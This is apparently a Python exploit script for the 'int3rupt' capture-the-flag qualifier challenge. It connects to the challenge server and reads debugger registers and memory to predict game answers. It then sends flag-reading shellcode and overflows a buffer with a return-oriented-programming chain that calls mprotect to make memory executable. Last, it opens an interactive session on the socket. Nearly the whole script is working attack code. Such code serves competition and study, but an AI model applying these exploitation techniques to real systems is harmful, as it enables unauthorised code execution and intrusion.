import sys
import phun
from struct import *

r = phun.Remote('int3rupt_484baa4dd43069c41da53e1ff9d0de11.quals.shallweplayaga.me',0xcccc)

def parse_regs(data):
    rx=data.replace(':\t',' ').replace('\t','\n').split("\n")[1:-1]
    rx=map(lambda x: tuple(x.lower().split(' ')),rx)
    rx=dict(map(lambda x: (x[0],int(x[1],16)),rx))
    return rx

def get_guess(r,regs):
    r.sendline('db ' + hex(regs['rbp']+0x14))
    d=r.read(">").strip().split('-')[0].split(' ')[1:5]
    d=int(''.join(d[::-1]),16)
    return d

def px(x):
    sys.stderr.write(x)
    sys.stderr.flush()
    
def win_game(r,dscore,clever=False):
    score = 0
    r.read('\n')
    while score < dscore:
        game=r.read("\n")
        r.read("\n")
        if 'chess' in game:
            if clever:
                r.read('>')
                r.sendline('c')
            else:
                r.read("\n")
            r.sendline(str(1))
            continue

        if clever:
            regs=parse_regs(r.read(">"))
            g = get_guess(r,regs)
            r.sendline('c')
            guess = None
            if 'd20' in game:
                guess= g % 0x14 + 1
            elif 'dice' in game:
                guess= g % 6 + 1
            elif 'think' in game:
                guess = g % 0x2710 + 1
        else:
            guess = 4
        
        r.sendline(str(guess))
        x=r.read('\n')
        if 'yes' in x:
#            print x
            score +=1
        print score
        if clever:
            r.read('>')
            r.sendline('c')
        else:
            r.read("\n")
        r.sendline(str(int(score < dscore)))

            
# def fill_table(r,1):
#     # r.sendline('bp %X'%addr)
#     # r.read('>');r.sendline('g')
#     px('[*] filling')
#     for i in range(20):
#         r.read('>')
#         r.sendline('g')
#         win_game(r,1)
#         r.read(":")
#         r.sendline('A'*15)
#         px('.')
        
#     print 'done.'

#     r.read('?')
#     ctx = 



#r.read('>')
#r.sendline('bp 4010F3')
#r.read('>');r.sendline('g')
#win_game(20)
#fill_table(r)
r.read('>');r.sendline('bp 40111E' )
r.read('>');r.sendline('bp 40128a' )
#r.read('>');r.sendline('bp 4012BB' )

r.read('>');r.sendline('g')
win_game(r,1)
print r.read(':')
r.write(phun.readfile('./flag',arch='x64')[1] + "\x00" + "\n")
print r.read('>')
p = "A"*0x38
p += phun.p64(0x4024d3)
p += phun.p64(0x6c5000)
p += phun.p64(0x4025e7)
p += phun.p64(0x1000)
p += phun.p64(0x438e45)
p += phun.p64(7)
p += phun.p64(0x436A50) # mprotect
p += phun.p64(0x6C5A81)
r.sendline('g')
print r.read("\n")
print r.read("\n")
print r.read("\n")
r.sendline(p)

import telnetlib
t = telnetlib.Telnet()
t.sock = r.sock
t.interact()